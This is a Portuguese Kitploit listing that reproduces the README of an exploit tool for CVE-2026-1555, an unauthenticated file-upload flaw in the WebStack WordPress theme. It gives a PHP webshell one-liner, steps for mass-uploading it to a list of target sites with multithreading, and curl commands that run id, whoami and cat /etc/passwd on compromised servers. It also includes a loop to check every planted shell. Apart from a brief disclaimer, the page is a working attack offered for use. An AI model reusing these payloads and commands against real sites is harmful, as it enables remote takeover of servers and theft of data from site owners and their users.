Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-1555 — WebStack <= 1.2024 - Upload Arbitrário de Arquivos Não Autenticado | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2026-1555
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubnxploited/cve-2026-1555

CVE-2026-1555

WebStack <= 1.2024 - Upload Arbitrário de Arquivos Não Autenticado

Ver Repositório
915há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-1555

WebStack <= 1.2024 - Upload Arbitrário de Arquivos sem Autenticação

👤 Por: Nxploited

🔗 Nxploited ZeroDay Hub — t.me/KNxploited


💀 CVE-2026-1555 — WebStack WordPress Upload Arbitrário de Arquivos

Execução Remota de Código sem Autenticação por meio do manipulador AJAX img_upload

Python CVE

CVSS
Auth

📌 Visão Geral da Vulnerabilidade

CampoDetalhe
Identificador CVECVE-2026-1555
Componente AfetadoTema WebStack para WordPress
Versões VulneráveisTodas as versões até 1.2024, inclusive
Tipo de VulnerabilidadeUpload Arbitrário de Arquivos → Execução Remota de Código
Autenticação Necessária❌ Nenhuma (Não autenticado)
Pontuação CVSS9.8 CRÍTICO
Vetor CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence

🔬 Causa Raiz Técnica

A função io_img_upload(), registrada no hook de ação img_upload do admin-ajax.php do WordPress, não realiza nenhuma validação de tipo de arquivo ou extensão antes de gravar o arquivo enviado no servidor. Como a ação é registrada sem verificações de autenticação (wp_ajax_nopriv_), qualquer atacante remoto não autenticado pode enviar via POST um arquivo arbitrário — incluindo um webshell PHP — e o servidor o armazenará em um caminho publicamente acessível, permitindo Execução Remota de Código direta.

Endpoint vulnerável:

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=img_upload
files=@<payload>

⚙️ Recursos da Ferramenta

  • 🔁 Varredura multithread com número configurável de workers
  • 📋 Suporte a alvos em lote por meio de um arquivo de lista de alvos
  • 📤 Extração automática da URL do shell a partir da resposta JSON
  • 💾 URLs de shells bem-sucedidos salvas em uploaded_paths.txt
  • 🎨 Interface de terminal rica com acompanhamento de progresso em tempo real
  • 🔕 Verificação SSL desativada para máxima compatibilidade

📦 Requisitos

Versão do Python: 3.8+

Instale as dependências:

root@kitploit:~
pip install requests rich urllib3

🚀 Uso

1. Prepare sua lista de alvos

Crie um arquivo chamado list.txt (ou qualquer nome de sua preferência) com um alvo por linha:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

Alvos sem http:// ou https:// recebem automaticamente o prefixo http://.

2. Prepare seu payload

Coloque seu webshell no mesmo diretório do script. Exemplo:

root@kitploit:~
# Minimal PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php

3. Execute a ferramenta

root@kitploit:~
python CVE-2026-1555.py

Você será solicitado a informar:

PromptDescriçãoPadrão
Targets fileCaminho para sua lista de alvoslist.txt
ThreadsNúmero de workers simultâneos6
Local file to uploadNome do arquivo do seu payload (no diretório do script)shell.php

📤 Saída e Extração do Shell

Saída em Tempo Real

Cada upload bem-sucedido exibe:

root@kitploit:~
╭─ IMG_UPLOAD ──────────────────────────────────╮
│ Upload successful                              │
│                                                │
│ Target:    https://target.com                  │
│ Shell URL: https://target.com/wp-content/...   │
╰────────────────────────────────────────────────╯

Resultados Salvos

Todas as URLs de shells bem-sucedidos são anexadas a:

root@kitploit:~
uploaded_paths.txt

Acessando Seu Shell

Após um upload bem-sucedido, acesse o shell diretamente pelo navegador ou via curl:

root@kitploit:~
# Browser
https://target.com/wp-content/uploads/shell.php?cmd=id

# curl
curl "https://target.com/wp-content/uploads/shell.php?cmd=whoami"

# Full command execution
curl "https://target.com/wp-content/uploads/shell.php?cmd=cat+/etc/passwd"

O caminho exato do upload é extraído da resposta JSON do servidor (data.src) e exibido automaticamente.

Verificação em Massa de Shells

Verifique rapidamente todos os shells enviados a partir do arquivo de saída:

root@kitploit:~
while read url; do
  echo -n "[*] $url -> "
  curl -sk "$url?cmd=id" 2>/dev/null || echo "DEAD"
done < uploaded_paths.txt

📊 Resumo da Saída

Ao final de cada execução, um resumo é exibido:

root@kitploit:~
Summary  50/50  OK: 12  FAIL: 38
╭──────────────────────────────────────────╮
│  Shell URLs saved to uploaded_paths.txt  │
╰──────────────────────────────────────────╯

🗂️ Estrutura de Arquivos

root@kitploit:~
CVE-2026-1555.py       ← Main exploit script
list.txt               ← Target URLs (one per line)
shell.php              ← Payload to upload
uploaded_paths.txt     ← Auto-generated: successful shell URLs

⚠️ Aviso Legal

Esta ferramenta é fornecida estritamente para testes de penetração autorizados, pesquisa de segurança e fins educacionais.

O autor — Nxploited — não assume nenhuma responsabilidade por qualquer uso indevido, dano ou atividade ilegal realizada com esta ferramenta. Ao usar esta ferramenta, você confirma que possui permissão escrita explícita para testar todos os sistemas-alvo.

O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal e pode resultar em processo criminal de acordo com as leis aplicáveis de crimes cibernéticos.

Use com responsabilidade. Você é o único responsável por suas ações.


👤 Autor: Nxploited 📣 Canal: Nxploited ZeroDay Hub 💬 Telegram: @KNxploited

Baixar ferramenta